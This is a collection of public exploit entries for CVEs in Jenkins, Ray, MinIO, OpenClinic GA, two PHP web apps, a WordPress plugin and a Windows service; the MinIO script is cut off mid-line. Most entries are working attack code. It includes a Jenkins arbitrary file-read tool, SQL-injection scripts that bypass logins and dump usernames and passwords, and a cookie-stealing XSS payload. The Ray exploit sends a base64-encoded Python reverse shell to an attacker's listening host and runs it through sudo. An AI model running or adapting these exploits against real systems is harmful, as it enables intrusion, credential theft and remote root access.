<pre><code># Exploit Title: Jenkins 2.441 - Local File Inclusion<br /># Date: 14/04/2024<br /># Exploit Author: Matisse Beckandt (Backendt)<br /># Vendor Homepage: https://www.jenkins.io/<br /># Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip<br /># Version: 2.441<br /># Tested on: Debian 12 (Bookworm)<br /># CVE: CVE-2024-23897<br /><br />from argparse import ArgumentParser<br />from requests import Session, post, exceptions<br />from threading import Thread<br />from uuid import uuid4<br />from time import sleep<br />from re import findall<br /><br />class Exploit(Thread):<br /> def __init__(self, url: str, identifier: str):<br /> Thread.__init__(self)<br /> self.daemon = True<br /> self.url = url<br /> self.params = {"remoting": "false"}<br /> self.identifier = identifier<br /> self.stop_thread = False<br /> self.listen = False<br /><br /> def run(self):<br /> while not self.stop_thread:<br /> if self.listen:<br /> self.listen_and_print()<br /><br /> def stop(self):<br /> self.stop_thread = True<br /><br /> def receive_next_message(self):<br /> self.listen = True<br /><br /> def wait_for_message(self):<br /> while self.listen:<br /> sleep(0.5)<br /><br /> def print_formatted_output(self, output: str):<br /> if "ERROR: No such file" in output:<br /> print("File not found.")<br /> elif "ERROR: Failed to parse" in output:<br /> print("Could not read file.")<br /><br /> expression = "No such agent \"(.*)\" exists."<br /> results = findall(expression, output)<br /> print("\n".join(results))<br /><br /> def listen_and_print(self):<br /> session = Session()<br /> headers = {"Side": "download", "Session": self.identifier}<br /> try:<br /> response = session.post(self.url, params=self.params, headers=headers)<br /> except (exceptions.ConnectTimeout, exceptions.ConnectionError):<br /> print("Could not connect to target to setup the listener.")<br /> exit(1)<br /><br /> self.print_formatted_output(response.text)<br /> self.listen = False<br /><br /> def send_file_request(self, filepath: str):<br /> headers = {"Side": "upload", "Session": self.identifier}<br /> payload = get_payload(filepath)<br /> try:<br /> post(self.url, data=payload, params=self.params, headers=headers, timeout=4)<br /> except (exceptions.ConnectTimeout, exceptions.ConnectionError):<br /> print("Could not connect to the target to send the request.")<br /> exit(1)<br /><br /> def read_file(self, filepath: str):<br /> self.receive_next_message()<br /> sleep(0.1)<br /> self.send_file_request(filepath)<br /> self.wait_for_message()<br /><br />def get_payload_message(operation_index: int, text: str) -> bytes:<br /> text_bytes = bytes(text, "utf-8")<br /> text_size = len(text_bytes)<br /> text_message = text_size.to_bytes(2) + text_bytes<br /> message_size = len(text_message)<br /><br /> payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message<br /> return payload<br /><br />def get_payload(filepath: str) -> bytes:<br /> arg_operation = 0<br /> start_operation = 3<br /><br /> command = get_payload_message(arg_operation, "connect-node")<br /> poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")<br /><br /> payload = command + poisoned_argument + start_operation.to_bytes(1)<br /> return payload<br /><br />def start_interactive_file_read(exploit: Exploit):<br /> print("Press Ctrl+C to exit")<br /> while True:<br /> filepath = input("File to download:\n> ")<br /> filepath = make_path_absolute(filepath)<br /> exploit.receive_next_message()<br /><br /> try:<br /> exploit.read_file(filepath)<br /> except exceptions.ReadTimeout:<br /> print("Payload request timed out.")<br /><br />def make_path_absolute(filepath: str) -> str:<br /> if not filepath.startswith('/'):<br /> return f"/proc/self/cwd/{filepath}"<br /> return filepath<br /><br />def format_target_url(url: str) -> str:<br /> if url.endswith('/'):<br /> url = url[:-1]<br /> return f"{url}/cli"<br /><br />def get_arguments():<br /> parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")<br /> parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")<br /> parser.add_argument("-p", "--path", help="The absolute path of the file to download")<br /> return parser.parse_args()<br /><br />def main():<br /> args = get_arguments()<br /> url = format_target_url(args.url)<br /> filepath = args.path<br /> identifier = str(uuid4())<br /><br /> exploit = Exploit(url, identifier)<br /> exploit.start()<br /><br /> if filepath:<br /> filepath = make_path_absolute(filepath)<br /> exploit.read_file(filepath)<br /> exploit.stop()<br /> return<br /><br /> try:<br /> start_interactive_file_read(exploit)<br /> except KeyboardInterrupt:<br /> pass<br /> print("\nQuitting")<br /> exploit.stop()<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure<br /># Date: 2023-08-14<br /># Exploit Author: VB<br /># Vendor Homepage: https://sourceforge.net/projects/open-clinic/<br /># Software Link: https://sourceforge.net/projects/open-clinic/<br /># Version: OpenClinic GA 5.247.01<br /># Tested on: Windows 10, Windows 11<br /># CVE: CVE-2023-40278<br /><br /># Details<br />An Information Disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The issue arises due to improper handling of error messages in response to manipulated input, allowing an attacker to deduce the existence of specific appointments.<br /><br /># Proof of Concept (POC)<br />Steps to Reproduce:<br /><br />- Access the Vulnerable Component:<br /><br />- Navigate to the URL: http://[IP]:10088/openclinic/planning/printAppointmentPdf.jsp?AppointmentUid=1.1.<br />- Manipulating the AppointmentUid Parameter:<br /><br />- Change the `AppointmentUid` parameter value to test different IDs.<br /><br />- For example, try different numerical values or formats.<br />- Observing the Responses:<br /><br />- Note the system's response when accessing with different `AppointmentUid` values.<br />- A "document is not open" error indicates the existence of an appointment with the specified ID.<br />- A different error message or response indicates non-existence.<br />- Confirming the Vulnerability:<br /><br />- The differing error messages based on the existence of an appointment confirm the Information Disclosure vulnerability.<br />- This allows an unauthorized user to deduce whether specific appointments exist without direct access to appointment data. As a result, an attacker could deduce the number of appointments performed by private clinics, surgeries and private doctors.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)<br /># Date: 2023-08-14<br /># Exploit Author: V. B.<br /># Vendor Homepage: https://sourceforge.net/projects/open-clinic/<br /># Software Link: https://sourceforge.net/projects/open-clinic/<br /># Version: OpenClinic GA 5.247.01<br /># Tested on: Windows 10, Windows 11<br /># CVE: CVE-2023-40279<br /><br /># Details<br />An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.<br /><br /># Proof of Concept (POC)<br />Steps to Reproduce:<br /><br />- Crafting the Malicious GET Request:<br /><br />- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.<br />- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):<br /><br />GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1<br />Host: 192.168.100.5:10088<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Connection: close<br />Cookie: JSESSIONID=[SESSION ID]<br />Cache-Control: max-age=0<br /><br />2. Confirming the Vulnerability:<br />- Send the crafted GET request to the target server.<br />- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.<br />- This vulnerability can lead to sensitive information disclosure or more severe attacks.<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass<br /># Date: 02/10/2024<br /># Exploit Author: Diyar Saadi<br /># Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip<br /># Version: V 1.2<br /># Tested on: Windows 11 + XAMPP 8.0.30<br /><br />## Exploit Description ##<br /><br />SQL Injection Vulnerability in ofrs/admin/index.php :<br />The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process.<br /><br />## Steps to reproduce ##<br /><br />1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php<br />2- Enter the following payload from username-box : admin'or'1--<br />3- Press Login button or press Enter .<br /><br />## Proof Of Concept [1] ##<br /><br />POST /ofrs/admin/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 46<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/ofrs/admin/index.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29<br />Connection: close<br /><br />username=admin%27or%27--&inputpwd=&login=login<br /><br />## Proof Of Concept [ Python Based Script ] [2] ##<br /><br />import os<br />import requests<br />from selenium import webdriver<br />from selenium.webdriver.common.by import By<br />from selenium.webdriver.support.ui import WebDriverWait<br />from selenium.webdriver.support import expected_conditions as EC<br />import pyautogui<br /><br /><br />banner = """<br /><br /><br /><br /><br /><br /><br /><br /><br />░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗<br />██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝<br />██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░<br />██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗<br />╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝<br />░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░<br /># Code By : Diyar Saadi<br /><br /><br /><br /><br /><br /><br /><br /> """<br /><br />print(banner)<br /><br />payload_requests = input("Enter the payload: ")<br /><br />url_requests = "http://localhost/ofrs/admin/index.php"<br />data = {<br /> 'username': payload_requests,<br /> 'password': 'password',<br /> 'login': 'Login'<br />}<br />headers = {<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Custom-Header': 'Your-Custom-Value'<br />}<br /><br />try:<br /> response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False)<br /><br /> if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']:<br /> print("Requests version: Admin Panel Successfully Bypassed !")<br /><br /> url_selenium = "http://localhost/ofrs/admin/index.php"<br /><br /> chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe"<br /><br /> chrome_options = webdriver.ChromeOptions()<br /> chrome_options.add_argument("executable_path=" + chrome_driver_path)<br /><br /> driver = webdriver.Chrome(options=chrome_options)<br /> driver.get(url_selenium)<br /><br /> pyautogui.typewrite(payload_requests)<br /> pyautogui.press('tab') <br /> pyautogui.typewrite(payload_requests)<br /><br /> pyautogui.press('enter')<br /><br /> WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php"))<br /><br /> screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png")<br /> driver.save_screenshot(screenshot_path)<br /> print(f"Selenium version: Screenshot saved as {screenshot_path}")<br /><br /> driver.quit()<br /><br /> else:<br /> print("Requests version: Login failed.")<br />except Exception as e:<br /> print(f"An error occurred: {e}")<br /><br /></code></pre>
<pre><code># Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection<br /># Date: February 6, 2024<br /># Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group<br /># Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip<br /># Tested on: Linux and Windows, XAMPP<br /># CVE-2023-51951<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import argparse<br /><br />def print_header():<br /> print("\033[1m\nStock Management System v1.0\033[0m")<br /> print("\033[1mSQL Injection Exploit\033[0m")<br /> print("\033[96mby blu3ming\n\033[0m")<br /><br />def parse_response(target_url):<br /> try:<br /> target_response = requests.get(target_url)<br /> soup = BeautifulSoup(target_response.text, 'html.parser')<br /> textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text<br /><br /> # Split the text using ',' as a delimiter<br /> users = textarea_text.split(',')<br /> for user in users:<br /> # Split username and password using ':' as a delimiter<br /> username, password = user.split(':')<br /> print("| {:<20} | {:<40} |".format(username, password))<br /> except:<br /> print("No data could be retrieved. Try again.")<br /><br />def retrieve_data(base_url):<br /> target_path = '/sms/admin/?page=purchase_order/manage_po&id='<br /> payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"<br /><br /> #Dump users table<br /> target_url = base_url + target_path + payload<br /> print("+----------------------+------------------------------------------+")<br /> print("| {:<20} | {:<40} |".format("username", "password"))<br /> print("+----------------------+------------------------------------------+")<br /> parse_response(target_url)<br /> print("+----------------------+------------------------------------------+\n")<br /><br />if __name__ == "__main__":<br /> about = 'Unauthenticated SQL Injection Exploit - Stock Management System'<br /> parser = argparse.ArgumentParser(description=about)<br /> parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')<br /> args = parser.parse_args()<br /> print_header()<br /> retrieve_data(args.base_url)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path<br /># Google Dork: null<br /># Date: 4/10/2024<br /># Exploit Author: Joseph Kwabena Fiagbor<br /># Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/<br /># Software Link:<br /># Version: v.1.23.0.02<br /># Tested on: windows 7-11<br /># CVE : CVE-2024-31804<br /><br />1. Description:<br /><br />The Terratec dmx_6fire usb installs as a service with an unquoted service<br />path running<br />with SYSTEM privileges.<br />This could potentially allow an authorized but non-privileged local<br />user to execute arbitrary code with elevated privileges on the system.<br /><br />2. Proof<br /><br />> C:\Users\Astra>sc qc "ttdmx6firesvc"<br />> {SC] QueryServiceConfig SUCCESS<br />><br />> SERVICE_NAME: ttdmx6firesvc<br />> TYPE : 10 WIN32_OWN_PROCESS<br />> START_TYPE : 2 AUTO_START<br />> ERROR_CONTROL : 1 NORMAL<br />> BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service<br />> LOAD_ORDER_GROUP : PlugPlay<br />> TAG : 0<br />> DISPLAY_NAME : DMX6Fire Control<br />> DEPENDENCIES : eventlog<br />> : PlugPlay<br />> SERVICE_START_NAME : LocalSystem<br />><br />><br /><br /></code></pre>
<pre><code># Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)<br /># Description:<br /># The Ray Project dashboard contains a CPU profiling page, and the format parameter is<br /># not validated before being inserted into a system command executed in a shell, allowing<br /># for arbitrary command execution. If the system is configured to allow passwordless sudo<br /># (a setup some Ray configurations require) this will result in a root shell being returned<br /># to the user. If not configured, a user level shell will be returned<br /># Version: <= 2.6.3<br /># Date: 2024-4-10<br /># Exploit Author: Fire_Wolf<br /># Tested on: Ubuntu 20.04.6 LTS<br /># Vendor Homepage: https://www.ray.io/<br /># Software Link: https://github.com/ray-project/ray<br /># CVE: CVE-2023-6019<br /># Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe<br /># ==========================================================================================<br /><br /># !usr/bin/python3<br /># coding=utf-8<br />import base64<br />import argparse<br />import requests<br />import urllib3<br /><br />proxies = {"http": "127.0.0.1:8080"}<br />headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"<br />}<br /><br /><br />def check_url(target, port):<br /> target_url = target + ":" + port<br /> https = 0<br /> if 'http' not in target:<br /> try:<br /> urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /> test_url = 'http://' + target_url<br /> response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)<br /> if response.status_code != 200:<br /> is_https = 0<br /> return is_https<br /> except Exception as e:<br /> print("ERROR! The Exception is:" + format(e))<br /> if https == 1:<br /> return "https://" + target_url<br /> else:<br /> return "http://" + target_url<br /><br /><br />def exp(target,ip,lhost, lport):<br /> payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''<br /> print("[*]Payload is: " + payload)<br /> b64_payload = base64.b64encode(payload.encode())<br /> print("[*]Base64 encoding payload is: " + b64_payload.decode())<br /> exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'<br /> # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)<br /> print(exp_url)<br /> urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /> response = requests.get(url=exp_url, headers=headers, verify=False)<br /> if response.status_code == 200:<br /> print("[-]ERROR: Exploit Failed,please check the payload.")<br /> else:<br /> print("[+]Exploit is finished,please check your machine!")<br /><br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser(<br /> description='''<br /> ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀<br /> ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄<br /> ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄<br /> ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃<br /> <br /> <br /> <br /> ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄<br /> ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄<br /> ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀<br /> ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄<br /> ''',<br /> formatter_class=argparse.RawDescriptionHelpFormatter,<br /> )<br /> parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')<br /> parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')<br /> parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')<br /> parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')<br /> args = parser.parse_args()<br /> # target = args.target<br /> ip = args.target<br /> # port = args.port<br /> # lhost = args.lhost<br /> # lport = args.lport<br /> targeturl = check_url(args.target, args.port)<br /> print(targeturl)<br /> print("[*] Checking in url: " + targeturl)<br /> exp(targeturl, ip, args.lhost, args.lport)<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)<br /># Date: 22 March 2024<br /># Exploit Author: Erdemstar<br /># Vendor: https://wordpress.com/<br /># Version: 1.32<br /><br /># Proof Of Concept:<br />1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".<br /><br /># PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns<br /># Vulnerable Properties name: name, playlist_id<br /># Payload: "><script>alert(document.cookie)</script><br /># Request:<br />POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2<br />Host: erdemstar.local<br />Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9<br />Content-Length: 178<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://erdemstar.local<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br /><br />_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000<br /><br /><br /></code></pre>
<pre><code># Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation<br /># Date: 2024-04-11<br /># Exploit Author: Jenson Zhao<br /># Vendor Homepage: https://min.io/<br /># Software Link: https://github.com/minio/minio/<br /># Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z<br /># Tested on: Windows 10<br /># CVE : CVE-2024-24747<br /># Required before execution: pip install minio,requests<br /><br />import argparse<br />import datetime<br />import traceback<br />import urllib<br />from xml.dom.minidom import parseString<br />import requests<br />import json<br />import base64<br />from minio.credentials import Credentials<br />from minio.signer import sign_v4_s3<br /><br />class CVE_2024_24747:<br /> new_buckets = []<br /> old_buckets = []<br /> def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):<br /> self.bucket_names = ['pocpublic', 'pocprivate']<br /> self.new_accesskey = 'miniocvepoc'<br /> self.new_secretkey = 'MINIOcvePOC'<br /> self.headers = {<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',<br /> 'Content-Type': 'application/json',<br /> 'Accept': '*/*'<br /> }<br /> self.accesskey = accesskey<br /> self.secretkey = secretkey<br /> self.verify = verify<br /> if verify:<br /> self.url = "https://" + host + ":" + port<br /> self.console_url = "https://" + host + ":" + console_port<br /> else:<br /> self.url = "http://" + host + ":" + port<br /> self.console_url = "http://" + host + ":" + console_port<br /> self.credits = Credentials(<br /> access_key=self.new_accesskey,<br /> secret_key=self.new_secretkey<br /> )<br /> self.login()<br /> try:<br /> self.create_buckets()<br /> self.create_accesskey()<br /> self.old_buckets = self.console_ls()<br /> self.console_exp()<br /> self.new_buckets = self.console_ls()<br /><br /> except:<br /> traceback.print_stack()<br /> finally:<br /> self.delete_accesskey()<br /> self.delete_buckets()<br /> if len(self.new_buckets) > len(self.old_buckets):<br /> print("There is CVE-2024-24747 problem with the minio!")<br /> print("Before the exploit, the buckets are : " + str(self.old_buckets))<br /> print("After the exploit, the buckets are : " + str(self.new_buckets))<br /> else:<br /> print("There is no CVE-2024-24747 problem with the minio!")<br /><br /> def login(self):<br /> url = self.url + "/api/v1/login"<br /> payload = json.dumps({<br /> "accessKey": self.accesskey,<br /> "secretKey": self.secretkey<br /> })<br /> self.session = requests.session()<br /> if self.verify:<br /> self.session.verify = False<br /> status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br /> # print(status_code)<br /> if status_code == 204:<br /> status_code = 0<br /> else:<br /> print('Login failed! Please check if the input accesskey and secretkey are correct!')<br /> exit(1)<br /> def create_buckets(self):<br /> url = self.url + "/api/v1/buckets"<br /> for name in self.bucket_names:<br /> payload = json.dumps({<br /> "name": name,<br /> "versioning": False,<br /> "locking": False<br /> })<br /> status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br /> # print(status_code)<br /> if status_code == 200:<br /> status_code = 0<br /> else:<br /> print("新建 (New)"+name+" bucket 失败 (fail)!")<br /> def delete_buckets(self):<br /> for name in self.bucket_names:<br /> url = self.url + "/api/v1/buckets/" + name<br /> status_code = self.session.request("DELETE", url, headers=self.headers).status_code<br /> # print(status_code)<br /> if status_code == 204:<br /> status_code = 0<br /> else:<br /> print("删除 (delete)"+name+" bucket 失败 (fail)!")<br /> def create_accesskey(self):<br /> url = self.url + "/api/v1/service-account-credentials"<br /> payload = json.dumps({<br /> "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}",<br /> "accessKey": self.new_accesskey,<br /> "secretKey": self.new_secretkey<br /> })<br /> status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br /> # print(status_code)<br /> if status_code == 201:<br /> # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)!")<br /> # print(self.new_secretkey)<br /> status_code = 0<br /> else:<br /> print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)!")<br /> def delete_accesskey(self):<br /> url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')<br /> status_code = self.session.request("DELETE", url, headers=self.headers).status_code<br /> # print(status_code)<br /> if status_code == 204:<br /> # print("删除" + self.new_accesskey + " accessKey成功!")<br /> status_code = 0<br /> else:<br /> print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)!")<br /> def headers_gen(self,url,sha256,method):<br /> datetimes = datetime.datetime.utcnow()<br /> datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')<br /> urls = urllib.parse.urlparse(url)<br /> headers = {<br /> 'X-Amz-Content-Sha256': sha256,<br /> 'X-Amz-Date': datetime_str,<br /> 'Host': urls.netloc,<br /> }<br /> headers = sign_v4_s3(<br /> method=method,<br /> url=urls,<br /> region='us-east-1',<br /> headers=headers,<br /> credentials=self.credits,<br /> content_sha256=sha256,<br /> date=datetimes,<br /> )<br /> return headers<br /> def console_ls(self):<br /> url = self.console_url + "/"<br /> sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"<br /> headers = self.headers_gen(url,sha256,'GET')<br /> if self.verify:<br /> response = requests.get(url,headers=headers,verify=False)<br /> else:<br /> response = requests.get(url, headers=headers)<br /> DOMTree = parseString(response.text)<br /> collection = DOMTree.documentElement<br /> buckets = collection.getElementsByTagName("Bucket")<br /> bucket_names = []<br /> for bucket in buckets:<br /> bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)<br /> # print('当前可查看的bucket有:\n' + str(bucket_names))<br /> return bucket_names<br /><br /> def console_exp(self):<br /> url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey<br /> sha256 = 